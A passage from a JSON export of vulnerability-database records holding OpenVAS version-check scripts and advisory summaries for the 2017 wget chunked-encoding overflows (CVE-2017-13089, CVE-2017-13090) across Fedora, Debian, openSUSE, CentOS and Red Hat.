"CVE-2017-13090"], "modified": "2017-11-28T00:00:00", "id": "OPENVAS:1361412562310873726", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310873726", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2017_10fbce01ec_wget_fc27.nasl 7920 2017-11-28 07:49:35Z asteins $\n#\n# Fedora Update for wget FEDORA-2017-10fbce01ec\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.873726\");\n script_version(\"$Revision: 7920 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-11-28 08:49:35 +0100 (Tue, 28 Nov 2017) $\");\n script_tag(name:\"creation_date\", value:\"2017-11-23 08:11:07 +0100 (Thu, 23 Nov 2017)\");\n script_cve_id(\"CVE-2017-13090\", \"CVE-2017-13089\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for wget FEDORA-2017-10fbce01ec\");\n script_tag(name: \"summary\", value: \"Check the version of wget\");\n script_tag(name: \"vuldetect\", value: \"Get the installed version with the help \nof detect NVT and check if the version is vulnerable or not.\");\n script_tag(name: \"insight\", value: \"GNU Wget is a file retrieval utility \nwhich can use either the HTTP or FTP protocols. Wget features include the \nability to work in the background while you are logged out, recursive retrieval \nof directories, file name wildcard matching, remote file timestamp\nstorage and comparison, use of Rest with FTP servers and Range with\nHTTP servers to retrieve files over slow or unstable connections,\nsupport for Proxy servers, and configurability.\n\");\n script_tag(name: \"affected\", value: \"wget on Fedora 27\");\n script_tag(name: \"solution\", value: \"Please Install the Updated Packages.\");\n\n script_xref(name: \"FEDORA\", value: \"2017-10fbce01ec\");\n script_xref(name: \"URL\" , value: \"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/JJKUFQV66VAXA6TWDXP2AO7IOUWYIEPM\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC27\")\n{\n\n if ((res = isrpmvuln(pkg:\"wget\", rpm:\"wget~1.19.2~1.fc27\", rls:\"FC27\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-01T23:39:48", "references": ["https://lists.debian.org/debian-lts-announce/2017/10/msg00028.html"], "pluginID": "1361412562310891149", "description": "CVE-2017-13089\nFix stack overflow in HTTP protocol handling.\n\nCVE-2017-13090\nFix heap overflow in HTTP protocol handling.", "edition": 7, "reporter": "Copyright (c) 2018 Greenbone Networks GmbH http://greenbone.net", "published": "2018-02-07T00:00:00", "title": "Debian LTS Advisory ([SECURITY] [DLA 1149-1] wget security update)", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Debian Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-13089", "CVE-2017-13090"], "modified": "2018-07-10T00:00:00", "id": "OPENVAS:1361412562310891149", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310891149", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: deb_dla_1149.nasl 10474 2018-07-10 08:12:26Z cfischer $\n#\n# Auto-generated from advisory DLA 1149-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2018 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.891149\");\n script_version(\"$Revision: 10474 $\");\n script_cve_id(\"CVE-2017-13089\", \"CVE-2017-13090\");\n script_name(\"Debian LTS Advisory ([SECURITY] [DLA 1149-1] wget security update)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-07-10 10:12:26 +0200 (Tue, 10 Jul 2018) $\");\n script_tag(name:\"creation_date\", value:\"2018-02-07 00:00:00 +0100 (Wed, 07 Feb 2018)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"https://lists.debian.org/debian-lts-announce/2017/10/msg00028.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2018 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB7\\.[0-9]+\");\n script_tag(name:\"affected\", value:\"wget on Debian Linux\");\n script_tag(name:\"insight\", value:\"Wget is a network utility to retrieve files from the web\nusing HTTP(S) and FTP, the two most widely used internet\nprotocols. It works non-interactively, so it will work in\nthe background, after having logged off. The program supports\nrecursive retrieval of web-authoring pages as well as FTP\nsites -- you can use Wget to make mirrors of archives and\nhome pages or to travel the web like a WWW robot.\");\n script_tag(name:\"solution\", value:\"For Debian 7 'Wheezy', these problems have been fixed in version\n1.13.4-3+deb7u5.\n\nWe recommend that you upgrade your wget packages.\");\n script_tag(name:\"summary\", value:\"CVE-2017-13089\nFix stack overflow in HTTP protocol handling.\n\nCVE-2017-13090\nFix heap overflow in HTTP protocol handling.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"wget\", ver:\"1.13.4-3+deb7u5\", rls_regex:\"DEB7\\.[0-9]+\", remove_arch:TRUE )) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-11-19T12:58:47", "references": ["2017:2884_1"], "pluginID": "1361412562310851637", "description": "The remote host is missing an update for the ", "edition": 9, "reporter": "Copyright (C) 2017 Greenbone Networks GmbH", "published": "2017-10-30T00:00:00", "title": "SuSE Update for wget openSUSE-SU-2017:2884-1 (wget)", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "SuSE Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-13089", "CVE-2017-13090"], "modified": "2018-11-16T00:00:00", "id": "OPENVAS:1361412562310851637", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310851637", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_suse_2017_2884_1.nasl 12381 2018-11-16 11:16:30Z cfischer $\n#\n# SuSE Update for wget openSUSE-SU-2017:2884-1 (wget)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.851637\");\n script_version(\"$Revision: 12381 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-16 12:16:30 +0100 (Fri, 16 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-10-30 09:25:34 +0100 (Mon, 30 Oct 2017)\");\n script_cve_id(\"CVE-2017-13089\", \"CVE-2017-13090\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"SuSE Update for wget openSUSE-SU-2017:2884-1 (wget)\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'wget'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"This update for wget fixes the following security issues:\n\n - CVE-2017-13089, CVE-2017-13090: Missing checks for negative\n remaining_chunk_size in skip_short_body and fd_read_body could cause\n stack buffer overflows, which could have been exploited by malicious\n servers. (bsc#1064715, bsc#1064716)\n\n This update was imported from the SUSE:SLE-12:Update update project.\");\n script_tag(name:\"affected\", value:\"wget on openSUSE Leap 42.3, openSUSE Leap 42.2\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2017:2884_1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=(openSUSELeap42\\.2|openSUSELeap42\\.3)\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\nres = \"\";\n\nif(release == \"openSUSELeap42.2\")\n{\n\n if ((res = isrpmvuln(pkg:\"wget\", rpm:\"wget~1.14~8.6.1\", rls:\"openSUSELeap42.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"wget-debuginfo\", rpm:\"wget-debuginfo~1.14~8.6.1\", rls:\"openSUSELeap42.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"wget-debugsource\", rpm:\"wget-debugsource~1.14~8.6.1\", rls:\"openSUSELeap42.2\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"openSUSELeap42.3\")\n{\n\n if ((res = isrpmvuln(pkg:\"wget\", rpm:\"wget~1.14~12.1\", rls:\"openSUSELeap42.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"wget-debuginfo\", rpm:\"wget-debuginfo~1.14~12.1\", rls:\"openSUSELeap42.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"wget-debugsource\", rpm:\"wget-debugsource~1.14~12.1\", rls:\"openSUSELeap42.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-01T23:44:39", "references": ["2017-de8a421dcd", "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/EYOPNYSFJSXB647QZFGAHNOGNHBEG4H5"], "pluginID": "1361412562310873772", "description": "Check the version of wget", "edition": 3, "reporter": "Copyright (C) 2017 Greenbone Networks GmbH", "published": "2017-11-23T00:00:00", "title": "Fedora Update for wget FEDORA-2017-de8a421dcd", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Fedora Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-13089", "CVE-2017-13090"], "modified": "2017-11-28T00:00:00", "id": "OPENVAS:1361412562310873772", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310873772", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2017_de8a421dcd_wget_fc25.nasl 7920 2017-11-28 07:49:35Z asteins $\n#\n# Fedora Update for wget FEDORA-2017-de8a421dcd\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.873772\");\n script_version(\"$Revision: 7920 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-11-28 08:49:35 +0100 (Tue, 28 Nov 2017) $\");\n script_tag(name:\"creation_date\", value:\"2017-11-23 08:15:01 +0100 (Thu, 23 Nov 2017)\");\n script_cve_id(\"CVE-2017-13090\", \"CVE-2017-13089\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for wget FEDORA-2017-de8a421dcd\");\n script_tag(name: \"summary\", value: \"Check the version of wget\");\n script_tag(name: \"vuldetect\", value: \"Get the installed version with the help \nof detect NVT and check if the version is vulnerable or not.\");\n script_tag(name: \"insight\", value: \"GNU Wget is a file retrieval utility which \ncan use either the HTTP or FTP protocols. Wget features include the ability to work \nin the background while you are logged out, recursive retrieval of directories, \nfile name wildcard matching, remote file timestamp storage and comparison, use of \nRest with FTP servers and Range with HTTP servers to retrieve files over slow or \nunstable connections, support for Proxy servers, and configurability.\n\");\n script_tag(name: \"affected\", value: \"wget on Fedora 25\");\n script_tag(name: \"solution\", value: \"Please Install the Updated Packages.\");\n\n script_xref(name: \"FEDORA\", value: \"2017-de8a421dcd\");\n script_xref(name: \"URL\" , value: \"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/EYOPNYSFJSXB647QZFGAHNOGNHBEG4H5\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC25\")\n{\n\n if ((res = isrpmvuln(pkg:\"wget\", rpm:\"wget~1.19.2~1.fc25\", rls:\"FC25\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-01T23:45:03", "references": ["http://lists.centos.org/pipermail/centos-announce/2017-October/022609.html", "2017:3075"], "pluginID": "1361412562310882793", "description": "Check the version of wget", "edition": 5, "reporter": "Copyright (C) 2017 Greenbone Networks GmbH", "published": "2017-10-27T00:00:00", "title": "CentOS Update for wget CESA-2017:3075 centos7 ", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "CentOS Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-13089", "CVE-2017-13090"], "modified": "2017-11-22T00:00:00", "id": "OPENVAS:1361412562310882793", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310882793", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_CESA-2017_3075_wget_centos7.nasl 7859 2017-11-22 09:05:55Z asteins $\n#\n# CentOS Update for wget CESA-2017:3075 centos7 \n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.882793\");\n script_version(\"$Revision: 7859 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-11-22 10:05:55 +0100 (Wed, 22 Nov 2017) $\");\n script_tag(name:\"creation_date\", value:\"2017-10-27 14:31:24 +0200 (Fri, 27 Oct 2017)\");\n script_cve_id(\"CVE-2017-13089\", \"CVE-2017-13090\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"CentOS Update for wget CESA-2017:3075 centos7 \");\n script_tag(name: \"summary\", value: \"Check the version of wget\");\n script_tag(name: \"vuldetect\", value: \"Get the installed version with the help \nof detect NVT and check if the version is vulnerable or not.\");\n script_tag(name: \"insight\", value: \"The wget packages provide the GNU Wget \nfile retrieval utility for HTTP, HTTPS, and FTP protocols.\n\nSecurity Fix(es):\n\n* A stack-based and a heap-based buffer overflow flaws were found in wget\nwhen processing chunked encoded HTTP responses. By tricking an unsuspecting\nuser into connecting to a malicious HTTP server, an attacker could exploit\nthese flaws to potentially execute arbitrary code. (CVE-2017-13089,\nCVE-2017-13090)\n\nRed Hat would like to thank the GNU Wget project for reporting these\nissues.\n\");\n script_tag(name: \"affected\", value: \"wget on CentOS 7\");\n script_tag(name: \"solution\", value: \"Please Install the Updated Packages.\");\n\n script_xref(name: \"CESA\", value: \"2017:3075\");\n script_xref(name: \"URL\" , value: \"http://lists.centos.org/pipermail/centos-announce/2017-October/022609.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS7\")\n{\n\n if ((res = isrpmvuln(pkg:\"wget\", rpm:\"wget~1.14~15.el7_4.1\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-01T23:44:41", "references": ["2017-f0b3231763", "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/F4CBITGRXX7NWYJ7YH7YKOXILMWPJ5ZB"], "pluginID": "1361412562310873582", "description": "Check the version of wget", "edition": 5, "reporter": "Copyright (C) 2017 Greenbone Networks GmbH", "published": "2017-11-08T00:00:00", "title": "Fedora Update for wget FEDORA-2017-f0b3231763", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Fedora Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-13089", "CVE-2017-13090"], "modified": "2017-11-22T00:00:00", "id": "OPENVAS:1361412562310873582", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310873582", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2017_f0b3231763_wget_fc26.nasl 7859 2017-11-22 09:05:55Z asteins $\n#\n# Fedora Update for wget FEDORA-2017-f0b3231763\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.873582\");\n script_version(\"$Revision: 7859 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-11-22 10:05:55 +0100 (Wed, 22 Nov 2017) $\");\n script_tag(name:\"creation_date\", value:\"2017-11-08 10:32:22 +0100 (Wed, 08 Nov 2017)\");\n script_cve_id(\"CVE-2017-13090\", \"CVE-2017-13089\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for wget FEDORA-2017-f0b3231763\");\n script_tag(name: \"summary\", value: \"Check the version of wget\");\n script_tag(name: \"vuldetect\", value: \"Get the installed version with the help \nof detect NVT and check if the version is vulnerable or not.\");\n script_tag(name: \"insight\", value: \"GNU Wget is a file retrieval utility \nwhich can use either the HTTP or FTP protocols. Wget features include the ability \nto work in the background while you are logged out, recursive retrieval of\ndirectories, file name wildcard matching, remote file timestamp\nstorage and comparison, use of Rest with FTP servers and Range with\nHTTP servers to retrieve files over slow or unstable connections,\nsupport for Proxy servers, and configurability.\n\");\n script_tag(name: \"affected\", value: \"wget on Fedora 26\");\n script_tag(name: \"solution\", value: \"Please Install the Updated Packages.\");\n\n script_xref(name: \"FEDORA\", value: \"2017-f0b3231763\");\n script_xref(name: \"URL\" , value: \"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/F4CBITGRXX7NWYJ7YH7YKOXILMWPJ5ZB\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC26\")\n{\n\n if ((res = isrpmvuln(pkg:\"wget\", rpm:\"wget~1.19.2~1.fc26\", rls:\"FC26\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-11-23T15:09:27", "references": ["2017:3075-01", "https://www.redhat.com/archives/rhsa-announce/2017-October/msg00038.html"], "pluginID": "1361412562310812056", "description": "The remote host is missing an update for the ", "edition": 8, "reporter": "Copyright (C) 2017 Greenbone Networks GmbH", "published": "2017-10-27T00:00:00", "title": "RedHat Update for wget RHSA-2017:3075-01", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Red Hat Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-13089", "CVE-2017-13090"], "modified": "2018-11-23T00:00:00", "id": "OPENVAS:1361412562310812056", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310812056", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_RHSA-2017_3075-01_wget.nasl 12497 2018-11-23 08:28:21Z cfischer $\n#\n# RedHat Update for wget RHSA-2017:3075-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.812056\");\n script_version(\"$Revision: 12497 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-23 09:28:21 +0100 (Fri, 23 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-10-27 14:30:52 +0200 (Fri, 27 Oct 2017)\");\n script_cve_id(\"CVE-2017-13089\", \"CVE-2017-13090\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"RedHat Update for wget RHSA-2017:3075-01\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'wget'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"The wget packages provide the GNU\n Wget file retrieval utility for HTTP, HTTPS, and FTP protocols.\n\nSecurity Fix(es):\n\n * A stack-based and a heap-based buffer overflow flaws were found in wget\nwhen processing chunked encoded HTTP responses. By tricking an unsuspecting\nuser into connecting to a malicious HTTP server, an attacker could exploit\nthese flaws to potentially execute arbitrary code. (CVE-2017-13089,\nCVE-2017-13090)\n\nRed Hat would like to thank the GNU Wget project for reporting these\nissues.\");\n script_tag(name:\"affected\", value:\"wget on Red Hat Enterprise Linux Server (v. 7)\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"RHSA\", value:\"2017:3075-01\");\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2017-October/msg00038.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_7\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_7\")\n{\n\n if ((res = 